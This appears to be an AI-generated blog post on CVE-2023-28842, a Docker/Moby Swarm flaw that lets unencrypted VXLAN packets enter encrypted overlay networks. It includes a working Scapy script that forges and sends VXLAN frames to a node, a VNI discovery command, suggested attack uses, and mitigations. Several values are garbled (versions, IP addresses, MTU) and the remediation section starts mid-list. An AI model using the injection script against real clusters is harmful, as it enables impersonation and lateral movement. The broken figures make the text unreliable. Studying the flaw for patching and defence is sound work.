CVE-2023-28842 - Injecting Packets Into Encrypted Docker Overlay Networks (Moby, Swarm, VXLAN/IPsec) – Deep Dive & Exploit

Published: 2024 | Severity: High  
Affects: Docker/Moby ≤ 23..2, 20.10.24, Mirantis ≤ 20.10.15 and all downstreams

Introduction

The world of containers depends heavily on robust, isolated networking across distributed nodes. Docker's Moby engine and its default Swarm orchestration provide such networking using overlay networks, powered by VXLAN and option for end-to-end encryption with IPsec. But a critical flaw, now tracked as CVE-2023-28842, makes it possible to inject arbitrary packets into supposedly encrypted overlay networks.

Worse, this exploit is silent: cleartext, unauthenticated packets can sneak directly into networks meant to be protected by encryption, allowing attackers to perform lateral movement, data interception, service impersonation and more across the cluster.

Why This Vulnerability Exists: A Minimalist’s View

Before the patch, Moby’s overlay driver set iptables (firewall) rules for encrypted overlays only if it detected active peers to communicate with. Until such a communication was set up, overlay networks would accept any VXLAN traffic — even unencrypted — as long as the correct VNI was used. This left a window (often indefinite) where untrusted packets could flow into encrypted contexts.

Encrypted overlay networks use IPsec, but only enforce it after some peer communication.

- VXLAN packets on UDP/4789 with the network’s VNI are accepted even if not encrypted.
- Attackers can craft and send their own VXLAN frames to any node, impersonating “allowed” overlay traffic.

What Does a Real Exploit Look Like?

Scenario:  
You’re on the same network segment (layer 2/3 reachable, e.g., same cloud VPC or data center VLAN) as a Docker/Moby Swarm node. The cluster has an “encrypted” overlay network (--opt encrypted). You want to inject or eavesdrop on services running there from outside.

Step 1: Get the VNI for the Overlay Network

VNIs are generally (but not always) sequential or visible from other VXLAN-related traffic. If you have access to another cluster node, you can list them like this:

# Show VXLAN devices
ip -d link show type vxlan

# Sample output:
# 6: vxlan: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 145 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 100
#     link/ether 92:35:a7:69:3f:62 brd ff:ff:ff:ff:ff:ff promiscuity  minmtu 68 maxmtu 65535
#     vxlan id 4097 group 239.<X>.<Y>.<Z> dev eth srcport   dstport 4789

# 4097 is our VNI

Step 2: Craft a VXLAN Packet

You can use Python’s Scapy library, or a tool like vxlan-toolkit, to build a custom VXLAN packet.

from scapy.all import *
from scapy.contrib.vxlan import VXLAN

# Replace this with the actual VNI
VNI = 4097
DST = '192.168.1.200'  # node with an encrypted overlay

# Create a dummy Ethernet frame as payload
eth = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(dst="10...100")/ICMP()

# VXLAN header and UDP encapsulation
vxlan_pkt = IP(dst=DST)/UDP(sport=54321, dport=4789)/VXLAN(vni=VNI)/eth

# Send the packet (needs raw socket, root)
send(vxlan_pkt)

Voila: The container(s) attached to the overlay will receive your raw Ethernet/IP packet, even if the overlay is supposed to be IPsec-encrypted. No authentication, no encryption, unless your packet is statically blocked elsewhere.

Inject ARP or IP traffic – impersonate overlay network endpoints or even intercept traffic.

- Transmit data to (“ping”) Swarm services (for enumeration, privilege escalation or compromise).
- Sniff returned or broadcast traffic if you’re able to join the node in some (even unprivileged) container.

Original References

- GHSA-vwm3-crmr-xfxw Security Advisory
- CVE-2023-28842 - NVD
- Upstream Moby issue & patches
- vxlan-toolkit

20.10.24 (20.x series)

Mirantis Container Runtime – upgrade to 20.10.16.

Multi-node clusters:

Deploy a global “pause” container (or any container holding a net namespace open) on every node in each encrypted overlay network. This forces the overlay driver to set up the correct firewall rules everywhere.
- Block UDP/4789 externally  
 Use a host or network firewall to prevent unfiltered VXLAN traffic from reaching swarm nodes, unless validated by IPsec.

Use publish mode host instead of ingress and remove the ingress overlay if not needed.

## Summary / Impact

CVE-2023-28842 makes it trivial for attackers with basic network access to inject hostile packets into Docker's encrypted overlays, bypassing overlay encryption and authentication. This threatens container isolation and allows substantial lateral movement in compromised environments.  
Patch. Now.


*Exclusive summary and demonstration by AI; see primary references for official advisories & project docs.*

Timeline

Published on: 04/04/2023 22:15:00 UTC
Last modified on: 04/14/2023 15:55:00 UTC